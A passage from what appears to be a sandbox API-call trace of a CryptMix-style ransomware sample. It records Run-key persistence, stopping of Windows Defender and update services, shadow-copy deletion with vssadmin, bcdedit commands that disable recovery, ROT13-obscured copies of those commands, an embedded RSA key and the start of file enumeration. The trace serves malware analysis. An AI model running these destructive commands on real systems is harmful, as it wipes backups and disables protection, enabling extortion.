out: lpdwFlags=0x0) returned 0 [0019.536] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.536] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.536] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.536] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.537] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.537] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.537] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.537] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.537] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.537] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.537] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.537] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.537] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.537] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.537] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.537] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.538] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.538] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.538] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.538] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.538] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.538] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.538] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.538] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.538] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.539] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.539] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.539] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.539] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.539] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.539] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.539] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.539] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.539] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.539] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.539] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.539] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.540] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.540] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.540] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.540] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.540] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.540] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.540] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.540] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.540] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.540] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.540] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.541] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.541] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.541] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.541] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.541] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.541] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.541] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.541] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.541] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.541] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.542] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.542] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.569] wsprintfW (in: param_1=0x180968, param_2="\"%s\"" | out: param_1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe\"") returned 61 [0019.569] GetUserNameW (in: lpBuffer=0x180558, pcbBuffer=0x180348 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x180348) returned 1 [0019.570] wsprintfW (in: param_1=0x180350, param_2="00FF%08X" | out: param_1="00FFE1010314") returned 12 [0019.570] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", phkResult=0x18034c | out: phkResult=0x18034c*=0x294) returned 0x0 [0019.570] RegSetValueExW (in: hKey=0x294, lpValueName="00FFE1010314", Reserved=0x0, dwType=0x1, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe\"", cbData=0x7a | out: lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe\"") returned 0x0 [0019.570] RegFlushKey (hKey=0x294) returned 0x0 [0019.667] RegCloseKey (hKey=0x294) returned 0x0 [0019.667] GetUserNameW (in: lpBuffer=0x180968, pcbBuffer=0x180758 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x180758) returned 1 [0019.667] wsprintfW (in: param_1=0x180760, param_2="BC%08X" | out: param_1="BCE1010314") returned 10 [0019.667] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", phkResult=0x18075c | out: phkResult=0x18075c*=0x294) returned 0x0 [0019.667] RegQueryValueExW (in: hKey=0x294, lpValueName="BCE1010314", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x2 [0019.667] OutputDebugStringA (lpOutputString="-0") [0019.667] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C sc stop VVS", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0020.015] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C sc stop wscsvc", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0020.069] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C sc stop WinDefend", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0020.132] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C sc stop wuauserv", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0020.199] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C sc stop BITS", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0020.249] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C sc stop ERSvc", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0020.326] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C sc stop WerSvc", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0020.384] lstrcpyW (in: lpString1=0x180fac, lpString2="/P iffnqzva.rkr Qryrgr Funqbjf /Nyy /Dhvrg" | out: lpString1="/P iffnqzva.rkr Qryrgr Funqbjf /Nyy /Dhvrg") returned="/P iffnqzva.rkr Qryrgr Funqbjf /Nyy /Dhvrg" [0020.384] lstrcpyW (in: lpString1=0x1813bc, lpString2="/P opqrqvg /frg {qrsnhyg} erpbirelranoyrq Ab" | out: lpString1="/P opqrqvg /frg {qrsnhyg} erpbirelranoyrq Ab") returned="/P opqrqvg /frg {qrsnhyg} erpbirelranoyrq Ab" [0020.384] lstrcpyW (in: lpString1=0x1811b4, lpString2="/P opqrqvg /frg {qrsnhyg} obbgfgnghfcbyvpl vtabernyysnvyherf" | out: lpString1="/P opqrqvg /frg {qrsnhyg} obbgfgnghfcbyvpl vtabernyysnvyherf") returned="/P opqrqvg /frg {qrsnhyg} obbgfgnghfcbyvpl vtabernyysnvyherf" [0020.384] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin.exe Delete Shadows /All /Quiet", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0020.835] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C bcdedit /set {default} recoveryenabled No", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0021.028] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0021.699] OutputDebugStringA (lpOutputString="-1") [0021.699] GetUserNameW (in: lpBuffer=0x180760, pcbBuffer=0x180754 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x180754) returned 1 [0021.700] wsprintfW (in: param_1=0x180968, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0021.700] CoCreateGuid (in: pguid=0x3dd6c08 | out: pguid=0x3dd6c08*(Data1=0xeb9e4beb, Data2=0x6738, Data3=0x47db, Data4=([0]=0xbc, [1]=0xc2, [2]=0x4b, [3]=0x22, [4]=0x2, [5]=0xaf, [6]=0xb3, [7]=0x3f))) returned 0x0 [0021.700] UuidToStringW (in: Uuid=0x3dd6c08, StringUuid=0x180758 | out: StringUuid=0x180758) returned 0x0 [0021.700] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x18075c | out: phkResult=0x18075c*=0x298) returned 0x0 [0021.700] RegQueryValueExW (in: hKey=0x298, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x2 [0021.700] RegSetValueExW (in: hKey=0x298, lpValueName="FFE1010314", Reserved=0x0, dwType=0x1, lpData="eb9e4beb-6738-47db-bcc2-4b2202afb33f", cbData=0x48 | out: lpData="eb9e4beb-6738-47db-bcc2-4b2202afb33f") returned 0x0 [0021.700] RegFlushKey (hKey=0x298) returned 0x0 [0021.710] RegCloseKey (hKey=0x298) returned 0x0 [0021.710] Sleep (dwMilliseconds=0xbb8) [0026.703] SetErrorMode (uMode=0x1) returned 0x0 [0026.703] GetUserNameW (in: lpBuffer=0x180540, pcbBuffer=0x17fb0c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17fb0c) returned 1 [0026.703] wsprintfW (in: param_1=0x180130, param_2="BC%08X" | out: param_1="BCE1010314") returned 10 [0026.703] wsprintfW (in: param_1=0x17ff28, param_2="*BC%08X" | out: param_1="*BCE1010314") returned 11 [0026.703] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x17fd20, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0026.703] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x17fb18, csidl=35, fCreate=0 | out: pszPath="C:\\ProgramData") returned 1 [0026.704] lstrcpyW (in: lpString1=0x180950, lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0026.704] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0026.704] lstrcatW (in: lpString1="C:\\ProgramData\\", lpString2="BCE1010314" | out: lpString1="C:\\ProgramData\\BCE1010314") returned="C:\\ProgramData\\BCE1010314" [0026.704] lstrcatW (in: lpString1="C:\\ProgramData\\BCE1010314", lpString2=".exe" | out: lpString1="C:\\ProgramData\\BCE1010314.exe") returned="C:\\ProgramData\\BCE1010314.exe" [0026.704] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe"), lpNewFileName="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe"), bFailIfExists=0) returned 1 [0026.716] CreateFileW (lpFileName="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0026.716] CloseHandle (hObject=0x298) returned 1 [0026.716] lstrcpyW (in: lpString1=0x180338, lpString2="C:\\ProgramData\\BCE1010314.exe" | out: lpString1="C:\\ProgramData\\BCE1010314.exe") returned="C:\\ProgramData\\BCE1010314.exe" [0026.716] lstrcatW (in: lpString1="C:\\ProgramData\\BCE1010314.exe", lpString2=":Zone.Identifier" | out: lpString1="C:\\ProgramData\\BCE1010314.exe:Zone.Identifier") returned="C:\\ProgramData\\BCE1010314.exe:Zone.Identifier" [0026.716] CreateFileW (lpFileName="C:\\ProgramData\\BCE1010314.exe:Zone.Identifier" (normalized: "c:\\programdata\\bce1010314.exe:zone.identifier"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0026.717] lstrlenA (lpString="[ZoneTransfer]\nZoneId=0") returned 23 [0026.717] WriteFile (in: hFile=0x298, lpBuffer=0x180b58*, nNumberOfBytesToWrite=0x17, lpNumberOfBytesWritten=0x17fb14, lpOverlapped=0x0 | out: lpBuffer=0x180b58*, lpNumberOfBytesWritten=0x17fb14*=0x17, lpOverlapped=0x0) returned 1 [0026.717] CloseHandle (hObject=0x298) returned 1 [0026.718] wsprintfW (in: param_1=0x180748, param_2="\"%s\"" | out: param_1="\"C:\\ProgramData\\BCE1010314.exe\"") returned 31 [0026.718] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", phkResult=0x17fb10 | out: phkResult=0x17fb10*=0x298) returned 0x0 [0026.718] RegSetValueExW (in: hKey=0x298, lpValueName="BCE1010314", Reserved=0x0, dwType=0x1, lpData="\"C:\\ProgramData\\BCE1010314.exe\"", cbData=0x3e | out: lpData="\"C:\\ProgramData\\BCE1010314.exe\"") returned 0x0 [0026.718] RegFlushKey (hKey=0x298) returned 0x0 [0026.732] RegCloseKey (hKey=0x298) returned 0x0 [0026.733] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", phkResult=0x17fb14 | out: phkResult=0x17fb14*=0x298) returned 0x0 [0026.733] RegSetValueExW (in: hKey=0x298, lpValueName="*BCE1010314", Reserved=0x0, dwType=0x1, lpData="\"C:\\ProgramData\\BCE1010314.exe\"", cbData=0x3e | out: lpData="\"C:\\ProgramData\\BCE1010314.exe\"") returned 0x0 [0026.733] RegFlushKey (hKey=0x298) returned 0x0 [0026.742] RegCloseKey (hKey=0x298) returned 0x0 [0026.742] Sleep (dwMilliseconds=0x1388) [0031.742] OutputDebugStringA (lpOutputString="-") [0031.742] GetUserNameW (in: lpBuffer=0x180da4, pcbBuffer=0x180b88 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x180b88) returned 1 [0031.743] wsprintfW (in: param_1=0x180b9c, param_2="%08X_offset" | out: param_1="E1010314_offset") returned 15 [0031.743] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="E1010314_offset") returned 0x298 [0031.743] WaitForSingleObject (hHandle=0x298, dwMilliseconds=0x0) returned 0x0 [0031.743] GetTickCount () returned 0x16834 [0031.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x180af0, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0031.743] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1806e0, csidl=35, fCreate=0 | out: pszPath="C:\\ProgramData") returned 1 [0031.743] lstrcpyW (in: lpString1=0x1808e8, lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0031.743] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0031.743] lstrcatW (in: lpString1="C:\\ProgramData\\", lpString2="F06C3C509054X0B7D28ZCDDBB17087B9C3E." | out: lpString1="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E.") returned="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E." [0031.743] lstrcatW (in: lpString1="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E.", lpString2="XZZX" | out: lpString1="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E.XZZX") returned="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E.XZZX" [0031.743] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0031.743] CreateFileW (lpFileName="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E.XZZX" (normalized: "c:\\programdata\\f06c3c509054x0b7d28zcddbb17087b9c3e.xzzx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0031.743] CreateFileW (lpFileName="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E.XZZX" (normalized: "c:\\programdata\\f06c3c509054x0b7d28zcddbb17087b9c3e.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0031.743] WriteFile (in: hFile=0x35c, lpBuffer=0x55829138*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x1806dc, lpOverlapped=0x0 | out: lpBuffer=0x55829138*, lpNumberOfBytesWritten=0x1806dc*=0x10f, lpOverlapped=0x0) returned 1 [0031.744] FlushFileBuffers (hFile=0x35c) returned 1 [0031.748] CloseHandle (hObject=0x35c) returned 1 [0031.749] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1806dc, csidl=35, fCreate=0 | out: pszPath="C:\\ProgramData") returned 1 [0031.749] lstrcpyW (in: lpString1=0x1808e4, lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0031.749] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0031.749] lstrcatW (in: lpString1="C:\\ProgramData\\", lpString2="F06C3C509054X0B7D28ZCDDBB17087B9C3E." | out: lpString1="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E.") returned="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E." [0031.749] lstrcatW (in: lpString1="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E.", lpString2="XZZX" | out: lpString1="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E.XZZX") returned="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E.XZZX" [0031.749] CreateFileW (lpFileName="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E.XZZX" (normalized: "c:\\programdata\\f06c3c509054x0b7d28zcddbb17087b9c3e.xzzx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0031.749] GetFileSize (in: hFile=0x35c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10f [0031.749] ReadFile (in: hFile=0x35c, lpBuffer=0x3483c8, nNumberOfBytesToRead=0x10f, lpNumberOfBytesRead=0x1806d8, lpOverlapped=0x0 | out: lpBuffer=0x3483c8*, lpNumberOfBytesRead=0x1806d8*=0x10f, lpOverlapped=0x0) returned 1 [0031.749] CloseHandle (hObject=0x35c) returned 1 [0031.749] StrStrA (lpFirst="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----", lpSrch="-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0031.749] OutputDebugStringA (lpOutputString="START1") [0031.750] SetErrorMode (uMode=0x1) returned 0x1 [0031.750] GetLogicalDriveStringsW (in: nBufferLength=0x34, lpBuffer=0x1815f8 | out: lpBuffer="C:\\") returned 0x4 [0031.750] lstrcatW (in: lpString1="C", lpString2=":" | out: lpString1="C:") returned="C:" [0031.750] GetDriveTypeW (lpRootPathName="C:") returned 0x3 [0031.750] SetErrorMode (uMode=0x1) returned 0x1 [0031.750] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:" | out: lpString1="C:") returned="C:" [0031.750] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0031.750] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\" | out: lpString1="C:\\") returned="C:\\" [0031.750] lstrcatW (in: lpString1="C:\\", lpString2="*.*" | out: lpString1="C:\\*.*") returned="C:\\*.*" [0031.750] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 0x324478 [0031.750] PathFindFileNameW (pszPath="C:") returned="C:" [0031.750] lstrcpyW (in: lpString1=0x17f8c4, lpString2="C:" | out: lpString1="C:") returned="C:" [0031.750] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0031.750] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0031.750] lstrcmpW (lpString1="bootmgr", lpString2="..") returned 1 [0031.750] lstrcmpW (lpString1="bootmgr", lpString2=".") returned 1 [0031.750] StrStrW (lpFirst="bootmgr", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0031.750] StrStrW (lpFirst="bootmgr", lpSrch="ntldr") returned 0x0 [0031.750] StrStrW (lpFirst="bootmgr", lpSrch="NTLDR") returned 0x0 [0031.750] StrStrW (lpFirst="bootmgr", lpSrch="NTDETECT.COM") returned 0x0 [0031.750] StrStrW (lpFirst="bootmgr", lpSrch="ntdetect.com") returned 0x0 [0031.750] StrStrW (lpFirst="C:\\", lpSrch="Desktop") returned 0x0 [0031.750] StrStrW (lpFirst="C:\\", lpSrch="DESKTOP") returned 0x0 [0031.750] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\") returned 7 [0031.750] lstrcpyA (in: lpString1=0x17fafc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0031.750] lstrcpyW (in: lpString1=0x1800fc, lpString2="bootmgr" | out: lpString1="bootmgr") returned="bootmgr" [0031.750] lstrcpyW (in: lpString1=0x17fcfc, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0031.751] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17fafc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x324 [0031.751] Sleep (dwMilliseconds=0x96) [0031.898] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0031.898] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2="..") returned 1 [0031.898] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2=".") returned 1 [0031.898] StrStrW (lpFirst="BOOTSECT.BAK", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0031.898] StrStrW (lpFirst="BOOTSECT.BAK", lpSrch="ntldr") returned 0x0 [0031.898] StrStrW (lpFirst="BOOTSECT.BAK", lpSrch="NTLDR") returned 0x0 [0031.898] StrStrW (lpFirst="BOOTSECT.BAK", lpSrch="NTDETECT.COM") returned 0x0 [0031.898] StrStrW (lpFirst="BOOTSECT.BAK", lpSrch="ntdetect.com") returned 0x0 [0031.898] StrStrW (lpFirst="C:\\", lpSrch="Desktop") returned 0x0 [0031.898] StrStrW (lpFirst="C:\\", lpSrch="DESKTOP") returned 0x0 [0031.898] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\") returned 7 [0031.898] lstrcpyA (in: lpString1=0x17fafc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- 